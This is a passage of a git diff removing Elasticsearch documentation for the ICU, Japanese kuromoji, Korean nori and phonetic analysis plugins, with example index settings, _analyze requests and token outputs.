{ref}/keyword.html[Keyword Field]. - -Defaults to using {defguide}/sorting-collations.html#uca[DUCET collation], -which is a best-effort attempt at language-neutral sorting. 
- -Below is an example of how to set up a field for sorting German names in -``phonebook'' order: - -[source,console] --------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "name": { <1> - "type": "text", - "fields": { - "sort": { <2> - "type": "icu_collation_keyword", - "index": false, - "language": "de", - "country": "DE", - "variant": "@collation=phonebook" - } - } - } - } - } -} - -GET /my-index-000001/_search <3> -{ - "query": { - "match": { - "name": "Fritz" - } - }, - "sort": "name.sort" -} - --------------------------- - -<1> The `name` field uses the `standard` analyzer, and so support full text queries. -<2> The `name.sort` field is an `icu_collation_keyword` field that will preserve the name as - a single token doc values, and applies the German ``phonebook'' order. -<3> An example query which searches the `name` field and sorts on the `name.sort` field. - -===== Parameters for ICU Collation Keyword Fields - -The following parameters are accepted by `icu_collation_keyword` fields: - -[horizontal] - -`doc_values`:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -`index`:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -`null_value`:: - - Accepts a string value which is substituted for any explicit `null` - values. Defaults to `null`, which means the field is treated as missing. - -{ref}/ignore-above.html[`ignore_above`]:: - - Strings longer than the `ignore_above` setting will be ignored. - Checking is performed on the original string before the collation. - The `ignore_above` setting can be updated on existing fields - using the {ref}/indices-put-mapping.html[PUT mapping API]. - By default, there is no limit and all values will be indexed. - -`store`:: - - Whether the field value should be stored and retrievable separately from - the {ref}/mapping-source-field.html[`_source`] field. Accepts `true` or `false` - (default). - -`fields`:: - - Multi-fields allow the same string value to be indexed in multiple ways for - different purposes, such as one field for search and a multi-field for - sorting and aggregations. - -===== Collation options - -`strength`:: - -The strength property determines the minimum level of difference considered -significant during comparison. Possible values are : `primary`, `secondary`, -`tertiary`, `quaternary` or `identical`. See the -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/Collator.html[ICU Collation documentation] -for a more detailed explanation for each value. Defaults to `tertiary` -unless otherwise specified in the collation. - -`decomposition`:: - -Possible values: `no` (default, but collation-dependent) or `canonical`. -Setting this decomposition property to `canonical` allows the Collator to -handle unnormalized text properly, producing the same results as if the text -were normalized. If `no` is set, it is the user's responsibility to insure -that all text is already in the appropriate form before a comparison or before -getting a CollationKey. Adjusting decomposition mode allows the user to select -between faster and more complete collation behavior. Since a great many of the -world's languages do not require text normalization, most locales set `no` as -the default decomposition mode. - -The following options are expert only: - -`alternate`:: - -Possible values: `shifted` or `non-ignorable`. 
Sets the alternate handling for -strength `quaternary` to be either shifted or non-ignorable. Which boils down -to ignoring punctuation and whitespace. - -`case_level`:: - -Possible values: `true` or `false` (default). Whether case level sorting is -required. When strength is set to `primary` this will ignore accent -differences. - - -`case_first`:: - -Possible values: `lower` or `upper`. Useful to control which case is sorted -first when case is not ignored for strength `tertiary`. The default depends on -the collation. - -`numeric`:: - -Possible values: `true` or `false` (default) . Whether digits are sorted -according to their numeric representation. For example the value `egg-9` is -sorted before the value `egg-21`. - - -`variable_top`:: - -Single character or contraction. Controls what is variable for `alternate`. - -`hiragana_quaternary_mode`:: - -Possible values: `true` or `false`. Distinguishing between Katakana and -Hiragana characters in `quaternary` strength. - - -[[analysis-icu-transform]] -==== ICU Transform Token Filter - -Transforms are used to process Unicode text in many different ways, such as -case mapping, normalization, transliteration and bidirectional text handling. - -You can define which transformation you want to apply with the `id` parameter -(defaults to `Null`), and specify text direction with the `dir` parameter -which accepts `forward` (default) for LTR and `reverse` for RTL. Custom -rulesets are not yet supported. - -For example: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "latin": { - "tokenizer": "keyword", - "filter": [ - "myLatinTransform" - ] - } - }, - "filter": { - "myLatinTransform": { - "type": "icu_transform", - "id": "Any-Latin; NFD; [:Nonspacing Mark:] Remove; NFC" <1> - } - } - } - } - } -} - -GET icu_sample/_analyze -{ - "analyzer": "latin", - "text": "你好" <2> -} - -GET icu_sample/_analyze -{ - "analyzer": "latin", - "text": "здравствуйте" <3> -} - -GET icu_sample/_analyze -{ - "analyzer": "latin", - "text": "こんにちは" <4> -} - --------------------------------------------------- - -<1> This transforms transliterates characters to Latin, and separates accents - from their base characters, removes the accents, and then puts the - remaining text into an unaccented form. - -<2> Returns `ni hao`. -<3> Returns `zdravstvujte`. -<4> Returns `kon'nichiha`. - -For more documentation, Please see the http://userguide.icu-project.org/transforms/general[user guide of ICU Transform]. diff --git a/docs/plugins/analysis-kuromoji.asciidoc b/docs/plugins/analysis-kuromoji.asciidoc deleted file mode 100644 index 4b1f3408882..00000000000 --- a/docs/plugins/analysis-kuromoji.asciidoc +++ /dev/null @@ -1,626 +0,0 @@ -[[analysis-kuromoji]] -=== Japanese (kuromoji) Analysis Plugin - -The Japanese (kuromoji) Analysis plugin integrates Lucene kuromoji analysis -module into {es}. - -:plugin_name: analysis-kuromoji -include::install_remove.asciidoc[] - -[[analysis-kuromoji-analyzer]] -==== `kuromoji` analyzer - -The `kuromoji` analyzer consists of the following tokenizer and token filters: - -* <> -* <> token filter -* <> token filter -* {ref}/analysis-cjk-width-tokenfilter.html[`cjk_width`] token filter -* <> token filter -* <> token filter -* {ref}/analysis-lowercase-tokenfilter.html[`lowercase`] token filter - -It supports the `mode` and `user_dictionary` settings from -<>. 
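Because the `kuromoji` analyzer is registered as soon as the plugin is
installed, a quick way to see what it produces is the `_analyze` API. This is
only a sketch: it assumes the plugin is installed, and the sample text and
resulting tokens vary with the dictionary and tokenization mode.

[source,console]
--------------------------------------------------
GET _analyze
{
  "analyzer": "kuromoji",
  "text": "関西国際空港" <1>
}
--------------------------------------------------

<1> "Kansai International Airport"; with the default `search` mode this is
    typically decompounded into tokens such as `関西`, `国際`, and `空港`.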
- -[discrete] -[[kuromoji-analyzer-normalize-full-width-characters]] -==== Normalize full-width characters - -The `kuromoji_tokenizer` tokenizer uses characters from the MeCab-IPADIC -dictionary to split text into tokens. The dictionary includes some full-width -characters, such as `o` and `f`. If a text contains full-width characters, -the tokenizer can produce unexpected tokens. - -For example, the `kuromoji_tokenizer` tokenizer converts the text -`Culture of Japan` to the tokens `[ culture, o, f, japan ]` -instead of `[ culture, of, japan ]`. - -To avoid this, add the <> to a custom analyzer based on the `kuromoji` analyzer. The -`icu_normalizer` character filter converts full-width characters to their normal -equivalents. - -First, duplicate the `kuromoji` analyzer to create the basis for a custom -analyzer. Then add the `icu_normalizer` character filter to the custom analyzer. -For example: - -[source,console] ----- -PUT index-00001 -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "kuromoji_normalize": { <1> - "char_filter": [ - "icu_normalizer" <2> - ], - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "kuromoji_baseform", - "kuromoji_part_of_speech", - "cjk_width", - "ja_stop", - "kuromoji_stemmer", - "lowercase" - ] - } - } - } - } - } -} ----- -<1> Creates a new custom analyzer, `kuromoji_normalize`, based on the `kuromoji` -analyzer. -<2> Adds the `icu_normalizer` character filter to the analyzer. - - -[[analysis-kuromoji-charfilter]] -==== `kuromoji_iteration_mark` character filter - -The `kuromoji_iteration_mark` normalizes Japanese horizontal iteration marks -(_odoriji_) to their expanded form. It accepts the following settings: - -`normalize_kanji`:: - - Indicates whether kanji iteration marks should be normalize. Defaults to `true`. - -`normalize_kana`:: - - Indicates whether kana iteration marks should be normalized. Defaults to `true` - - -[[analysis-kuromoji-tokenizer]] -==== `kuromoji_tokenizer` - -The `kuromoji_tokenizer` accepts the following settings: - -`mode`:: -+ --- - -The tokenization mode determines how the tokenizer handles compound and -unknown words. It can be set to: - -`normal`:: - - Normal segmentation, no decomposition for compounds. Example output: - - 関西国際空港 - アブラカダブラ - -`search`:: - - Segmentation geared towards search. This includes a decompounding process - for long nouns, also including the full compound token as a synonym. - Example output: - - 関西, 関西国際空港, 国際, 空港 - アブラカダブラ - -`extended`:: - - Extended mode outputs unigrams for unknown words. Example output: - - 関西, 関西国際空港, 国際, 空港 - ア, ブ, ラ, カ, ダ, ブ, ラ --- - -`discard_punctuation`:: - - Whether punctuation should be discarded from the output. Defaults to `true`. - -`user_dictionary`:: -+ --- -The Kuromoji tokenizer uses the MeCab-IPADIC dictionary by default. A `user_dictionary` -may be appended to the default dictionary. The dictionary should have the following CSV format: - -[source,csv] ------------------------ -, ... , ... 
, ------------------------ --- - -As a demonstration of how the user dictionary can be used, save the following -dictionary to `$ES_HOME/config/userdict_ja.txt`: - -[source,csv] ------------------------ -東京スカイツリー,東京 スカイツリー,トウキョウ スカイツリー,カスタム名詞 ------------------------ - --- - -You can also inline the rules directly in the tokenizer definition using -the `user_dictionary_rules` option: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "kuromoji_user_dict": { - "type": "kuromoji_tokenizer", - "mode": "extended", - "user_dictionary_rules": ["東京スカイツリー,東京 スカイツリー,トウキョウ スカイツリー,カスタム名詞"] - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "kuromoji_user_dict" - } - } - } - } - } -} --------------------------------------------------- --- - -`nbest_cost`/`nbest_examples`:: -+ --- -Additional expert user parameters `nbest_cost` and `nbest_examples` can be used -to include additional tokens that most likely according to the statistical model. -If both parameters are used, the largest number of both is applied. - -`nbest_cost`:: - - The `nbest_cost` parameter specifies an additional Viterbi cost. - The KuromojiTokenizer will include all tokens in Viterbi paths that are - within the nbest_cost value of the best path. - -`nbest_examples`:: - - The `nbest_examples` can be used to find a `nbest_cost` value based on examples. - For example, a value of /箱根山-箱根/成田空港-成田/ indicates that in the texts, - 箱根山 (Mt. Hakone) and 成田空港 (Narita Airport) we'd like a cost that gives is us - 箱根 (Hakone) and 成田 (Narita). --- - - -Then create an analyzer as follows: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "kuromoji_user_dict": { - "type": "kuromoji_tokenizer", - "mode": "extended", - "discard_punctuation": "false", - "user_dictionary": "userdict_ja.txt" - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "kuromoji_user_dict" - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "東京スカイツリー" -} --------------------------------------------------- - -The above `analyze` request returns the following: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "東京", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, { - "token" : "スカイツリー", - "start_offset" : 2, - "end_offset" : 8, - "type" : "word", - "position" : 1 - } ] -} --------------------------------------------------- - -`discard_compound_token`:: - Whether original compound tokens should be discarded from the output with `search` mode. Defaults to `false`. - Example output with `search` or `extended` mode and this option `true`: - - 関西, 国際, 空港 - -NOTE: If a text contains full-width characters, the `kuromoji_tokenizer` -tokenizer can produce unexpected tokens. To avoid this, add the -<> to -your analyzer. See <>. - - -[[analysis-kuromoji-baseform]] -==== `kuromoji_baseform` token filter - -The `kuromoji_baseform` token filter replaces terms with their -BaseFormAttribute. This acts as a lemmatizer for verbs and adjectives. 
Example: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "kuromoji_baseform" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "飲み" -} --------------------------------------------------- - -which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "飲む", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - } ] -} --------------------------------------------------- - - -[[analysis-kuromoji-speech]] -==== `kuromoji_part_of_speech` token filter - -The `kuromoji_part_of_speech` token filter removes tokens that match a set of -part-of-speech tags. It accepts the following setting: - -`stoptags`:: - - An array of part-of-speech tags that should be removed. It defaults to the - `stoptags.txt` file embedded in the `lucene-analyzer-kuromoji.jar`. - -For example: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "my_posfilter" - ] - } - }, - "filter": { - "my_posfilter": { - "type": "kuromoji_part_of_speech", - "stoptags": [ - "助詞-格助詞-一般", - "助詞-終助詞" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "寿司がおいしいね" -} --------------------------------------------------- - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "寿司", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, { - "token" : "おいしい", - "start_offset" : 3, - "end_offset" : 7, - "type" : "word", - "position" : 2 - } ] -} --------------------------------------------------- - - -[[analysis-kuromoji-readingform]] -==== `kuromoji_readingform` token filter - -The `kuromoji_readingform` token filter replaces the token with its reading -form in either katakana or romaji. It accepts the following setting: - -`use_romaji`:: - - Whether romaji reading form should be output instead of katakana. Defaults to `false`. - -When using the pre-defined `kuromoji_readingform` filter, `use_romaji` is set -to `true`. The default when defining a custom `kuromoji_readingform`, however, -is `false`. The only reason to use the custom form is if you need the -katakana reading form: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "romaji_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ "romaji_readingform" ] - }, - "katakana_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ "katakana_readingform" ] - } - }, - "filter": { - "romaji_readingform": { - "type": "kuromoji_readingform", - "use_romaji": true - }, - "katakana_readingform": { - "type": "kuromoji_readingform", - "use_romaji": false - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "katakana_analyzer", - "text": "寿司" <1> -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "romaji_analyzer", - "text": "寿司" <2> -} --------------------------------------------------- - -<1> Returns `スシ`. -<2> Returns `sushi`. 
- -[[analysis-kuromoji-stemmer]] -==== `kuromoji_stemmer` token filter - -The `kuromoji_stemmer` token filter normalizes common katakana spelling -variations ending in a long sound character by removing this character -(U+30FC). Only full-width katakana characters are supported. - -This token filter accepts the following setting: - -`minimum_length`:: - - Katakana words shorter than the `minimum length` are not stemmed (default - is `4`). - - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "my_katakana_stemmer" - ] - } - }, - "filter": { - "my_katakana_stemmer": { - "type": "kuromoji_stemmer", - "minimum_length": 4 - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "コピー" <1> -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "サーバー" <2> -} --------------------------------------------------- - -<1> Returns `コピー`. -<2> Return `サーバ`. - - -[[analysis-kuromoji-stop]] -==== `ja_stop` token filter - -The `ja_stop` token filter filters out Japanese stopwords (`_japanese_`), and -any other custom stopwords specified by the user. This filter only supports -the predefined `_japanese_` stopwords list. If you want to use a different -predefined list, then use the -{ref}/analysis-stop-tokenfilter.html[`stop` token filter] instead. - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "analyzer_with_ja_stop": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "ja_stop" - ] - } - }, - "filter": { - "ja_stop": { - "type": "ja_stop", - "stopwords": [ - "_japanese_", - "ストップ" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "analyzer_with_ja_stop", - "text": "ストップは消える" -} --------------------------------------------------- - -The above request returns: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "消える", - "start_offset" : 5, - "end_offset" : 8, - "type" : "word", - "position" : 2 - } ] -} --------------------------------------------------- - - -[[analysis-kuromoji-number]] -==== `kuromoji_number` token filter - -The `kuromoji_number` token filter normalizes Japanese numbers (kansūji) -to regular Arabic decimal numbers in half-width characters. 
For example: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "kuromoji_number" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "一〇〇〇" -} --------------------------------------------------- - -Which results in: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "1000", - "start_offset" : 0, - "end_offset" : 4, - "type" : "word", - "position" : 0 - } ] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-nori.asciidoc b/docs/plugins/analysis-nori.asciidoc deleted file mode 100644 index 6a2e7c767ba..00000000000 --- a/docs/plugins/analysis-nori.asciidoc +++ /dev/null @@ -1,545 +0,0 @@ -[[analysis-nori]] -=== Korean (nori) Analysis Plugin - -The Korean (nori) Analysis plugin integrates Lucene nori analysis -module into elasticsearch. It uses the https://bitbucket.org/eunjeon/mecab-ko-dic[mecab-ko-dic dictionary] -to perform morphological analysis of Korean texts. - -:plugin_name: analysis-nori -include::install_remove.asciidoc[] - -[[analysis-nori-analyzer]] -==== `nori` analyzer - -The `nori` analyzer consists of the following tokenizer and token filters: - -* <> -* <> token filter -* <> token filter -* {ref}/analysis-lowercase-tokenfilter.html[`lowercase`] token filter - -It supports the `decompound_mode` and `user_dictionary` settings from -<> and the `stoptags` setting from -<>. - -[[analysis-nori-tokenizer]] -==== `nori_tokenizer` - -The `nori_tokenizer` accepts the following settings: - -`decompound_mode`:: -+ --- - -The decompound mode determines how the tokenizer handles compound tokens. -It can be set to: - -`none`:: - - No decomposition for compounds. Example output: - - 가거도항 - 가곡역 - -`discard`:: - - Decomposes compounds and discards the original form (*default*). Example output: - - 가곡역 => 가곡, 역 - -`mixed`:: - - Decomposes compounds and keeps the original form. Example output: - - 가곡역 => 가곡역, 가곡, 역 --- - -`discard_punctuation`:: - - Whether punctuation should be discarded from the output. Defaults to `true`. - -`user_dictionary`:: -+ --- -The Nori tokenizer uses the https://bitbucket.org/eunjeon/mecab-ko-dic[mecab-ko-dic dictionary] by default. -A `user_dictionary` with custom nouns (`NNG`) may be appended to the default dictionary. -The dictionary should have the following format: - -[source,txt] ------------------------ - [ ... ] ------------------------ - -The first token is mandatory and represents the custom noun that should be added in -the dictionary. For compound nouns the custom segmentation can be provided -after the first token (`[ ... ]`). The segmentation of the -custom compound nouns is controlled by the `decompound_mode` setting. - - -As a demonstration of how the user dictionary can be used, save the following -dictionary to `$ES_HOME/config/userdict_ko.txt`: - -[source,txt] ------------------------ -c++ <1> -C샤프 -세종 -세종시 세종 시 <2> ------------------------ - -<1> A simple noun -<2> A compound noun (`세종시`) followed by its decomposition: `세종` and `시`. 
- -Then create an analyzer as follows: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "nori_user_dict": { - "type": "nori_tokenizer", - "decompound_mode": "mixed", - "discard_punctuation": "false", - "user_dictionary": "userdict_ko.txt" - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "nori_user_dict" - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "세종시" <1> -} --------------------------------------------------- - -<1> Sejong city - -The above `analyze` request returns the following: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "세종시", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0, - "positionLength" : 2 <1> - }, { - "token" : "세종", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, { - "token" : "시", - "start_offset" : 2, - "end_offset" : 3, - "type" : "word", - "position" : 1 - }] -} --------------------------------------------------- - -<1> This is a compound token that spans two positions (`mixed` mode). --- - -`user_dictionary_rules`:: -+ --- - -You can also inline the rules directly in the tokenizer definition using -the `user_dictionary_rules` option: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "nori_user_dict": { - "type": "nori_tokenizer", - "decompound_mode": "mixed", - "user_dictionary_rules": ["c++", "C샤프", "세종", "세종시 세종 시"] - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "nori_user_dict" - } - } - } - } - } -} --------------------------------------------------- --- - -The `nori_tokenizer` sets a number of additional attributes per token that are used by token filters -to modify the stream. 
-You can view all these additional attributes with the following request: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "nori_tokenizer", - "text": "뿌리가 깊은 나무는", <1> - "attributes" : ["posType", "leftPOS", "rightPOS", "morphemes", "reading"], - "explain": true -} --------------------------------------------------- - -<1> A tree with deep roots - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": { - "name": "nori_tokenizer", - "tokens": [ - { - "token": "뿌리", - "start_offset": 0, - "end_offset": 2, - "type": "word", - "position": 0, - "leftPOS": "NNG(General Noun)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "NNG(General Noun)" - }, - { - "token": "가", - "start_offset": 2, - "end_offset": 3, - "type": "word", - "position": 1, - "leftPOS": "J(Ending Particle)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "J(Ending Particle)" - }, - { - "token": "깊", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 2, - "leftPOS": "VA(Adjective)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "VA(Adjective)" - }, - { - "token": "은", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 3, - "leftPOS": "E(Verbal endings)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "E(Verbal endings)" - }, - { - "token": "나무", - "start_offset": 7, - "end_offset": 9, - "type": "word", - "position": 4, - "leftPOS": "NNG(General Noun)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "NNG(General Noun)" - }, - { - "token": "는", - "start_offset": 9, - "end_offset": 10, - "type": "word", - "position": 5, - "leftPOS": "J(Ending Particle)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "J(Ending Particle)" - } - ] - }, - "tokenfilters": [] - } -} --------------------------------------------------- - - -[[analysis-nori-speech]] -==== `nori_part_of_speech` token filter - -The `nori_part_of_speech` token filter removes tokens that match a set of -part-of-speech tags. The list of supported tags and their meanings can be found here: -{lucene-core-javadoc}/../analyzers-nori/org/apache/lucene/analysis/ko/POS.Tag.html[Part of speech tags] - -It accepts the following setting: - -`stoptags`:: - - An array of part-of-speech tags that should be removed. 
- -and defaults to: - -[source,js] --------------------------------------------------- -"stoptags": [ - "E", - "IC", - "J", - "MAG", "MAJ", "MM", - "SP", "SSC", "SSO", "SC", "SE", - "XPN", "XSA", "XSN", "XSV", - "UNA", "NA", "VSV" -] --------------------------------------------------- -// NOTCONSOLE - -For example: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "nori_tokenizer", - "filter": [ - "my_posfilter" - ] - } - }, - "filter": { - "my_posfilter": { - "type": "nori_part_of_speech", - "stoptags": [ - "NR" <1> - ] - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "여섯 용이" <2> -} --------------------------------------------------- - -<1> Korean numerals should be removed (`NR`) -<2> Six dragons - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "용", - "start_offset" : 3, - "end_offset" : 4, - "type" : "word", - "position" : 1 - }, { - "token" : "이", - "start_offset" : 4, - "end_offset" : 5, - "type" : "word", - "position" : 2 - } ] -} --------------------------------------------------- - - -[[analysis-nori-readingform]] -==== `nori_readingform` token filter - -The `nori_readingform` token filter rewrites tokens written in Hanja to their Hangul form. - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "nori_tokenizer", - "filter": [ "nori_readingform" ] - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "鄕歌" <1> -} --------------------------------------------------- - -<1> A token written in Hanja: Hyangga - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "향가", <1> - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }] -} --------------------------------------------------- - -<1> The Hanja form is replaced by the Hangul translation. - - -[[analysis-nori-number]] -==== `nori_number` token filter - -The `nori_number` token filter normalizes Korean numbers -to regular Arabic decimal numbers in half-width characters. - -Korean numbers are often written using a combination of Hangul and Arabic numbers with various kinds punctuation. -For example, 3.2천 means 3200. -This filter does this kind of normalization and allows a search for 3200 to match 3.2천 in text, -but can also be used to make range facets based on the normalized numbers and so on. - -[NOTE] -==== -Notice that this analyzer uses a token composition scheme and relies on punctuation tokens -being found in the token stream. -Please make sure your `nori_tokenizer` has `discard_punctuation` set to false. -In case punctuation characters, such as U+FF0E(.), is removed from the token stream, -this filter would find input tokens 3 and 2천 and give outputs 3 and 2000 instead of 3200, -which is likely not the intended result. - -If you want to remove punctuation characters from your index that are not part of normalized numbers, -add a `stop` token filter with the punctuation you wish to remove after `nori_number` in your analyzer chain. -==== -Below are some examples of normalizations this filter supports. 
-The input is untokenized text and the result is the single term attribute emitted for the input. - -- 영영칠 -> 7 -- 일영영영 -> 1000 -- 삼천2백2십삼 -> 3223 -- 조육백만오천일 -> 1000006005001 -- 3.2천 -> 3200 -- 1.2만345.67 -> 12345.67 -- 4,647.100 -> 4647.1 -- 15,7 -> 157 (be aware of this weakness) - -For example: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "tokenizer_discard_puncuation_false", - "filter": [ - "part_of_speech_stop_sp", "nori_number" - ] - } - }, - "tokenizer": { - "tokenizer_discard_puncuation_false": { - "type": "nori_tokenizer", - "discard_punctuation": "false" - } - }, - "filter": { - "part_of_speech_stop_sp": { - "type": "nori_part_of_speech", - "stoptags": ["SP"] - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "십만이천오백과 3.2천" -} --------------------------------------------------- - -Which results in: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [{ - "token" : "102500", - "start_offset" : 0, - "end_offset" : 6, - "type" : "word", - "position" : 0 - }, { - "token" : "과", - "start_offset" : 6, - "end_offset" : 7, - "type" : "word", - "position" : 1 - }, { - "token" : "3200", - "start_offset" : 8, - "end_offset" : 12, - "type" : "word", - "position" : 2 - }] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-phonetic.asciidoc b/docs/plugins/analysis-phonetic.asciidoc deleted file mode 100644 index 1f43862bac8..00000000000 --- a/docs/plugins/analysis-phonetic.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[analysis-phonetic]] -=== Phonetic Analysis Plugin - -The Phonetic Analysis plugin provides token filters which convert tokens to -their phonetic representation using Soundex, Metaphone, and a variety of other -algorithms. - -:plugin_name: analysis-phonetic -include::install_remove.asciidoc[] - - -[[analysis-phonetic-token-filter]] -==== `phonetic` token filter - -The `phonetic` token filter takes the following settings: - -`encoder`:: - - Which phonetic encoder to use. Accepts `metaphone` (default), - `double_metaphone`, `soundex`, `refined_soundex`, `caverphone1`, - `caverphone2`, `cologne`, `nysiis`, `koelnerphonetik`, `haasephonetik`, - `beider_morse`, `daitch_mokotoff`. - -`replace`:: - - Whether or not the original token should be replaced by the phonetic - token. Accepts `true` (default) and `false`. Not supported by - `beider_morse` encoding. - -[source,console] --------------------------------------------------- -PUT phonetic_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "my_metaphone" - ] - } - }, - "filter": { - "my_metaphone": { - "type": "phonetic", - "encoder": "metaphone", - "replace": false - } - } - } - } - } -} - -GET phonetic_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "Joe Bloggs" <1> -} --------------------------------------------------- - -<1> Returns: `J`, `joe`, `BLKS`, `bloggs` - -It is important to note that `"replace": false` can lead to unexpected behavior since -the original and the phonetically analyzed version are both kept at the same token position. -Some queries handle these stacked tokens in special ways. For example, the fuzzy `match` -query does not apply {ref}/common-options.html#fuzziness[fuzziness] to stacked synonym tokens. 
-This can lead to issues that are difficult to diagnose and reason about. For this reason, it -is often beneficial to use separate fields for analysis with and without phonetic filtering. -That way searches can be run against both fields with differing boosts and trade-offs (e.g. -only run a fuzzy `match` query on the original text field, but not on the phonetic version). - -[discrete] -===== Double metaphone settings - -If the `double_metaphone` encoder is used, then this additional setting is -supported: - -`max_code_len`:: - - The maximum length of the emitted metaphone token. Defaults to `4`. - -[discrete] -===== Beider Morse settings - -If the `beider_morse` encoder is used, then these additional settings are -supported: - -`rule_type`:: - - Whether matching should be `exact` or `approx` (default). - -`name_type`:: - - Whether names are `ashkenazi`, `sephardic`, or `generic` (default). - -`languageset`:: - - An array of languages to check. If not specified, then the language will - be guessed. Accepts: `any`, `common`, `cyrillic`, `english`, `french`, - `german`, `hebrew`, `hungarian`, `polish`, `romanian`, `russian`, - `spanish`. diff --git a/docs/plugins/analysis-smartcn.asciidoc b/docs/plugins/analysis-smartcn.asciidoc deleted file mode 100644 index 704c15b56e6..00000000000 --- a/docs/plugins/analysis-smartcn.asciidoc +++ 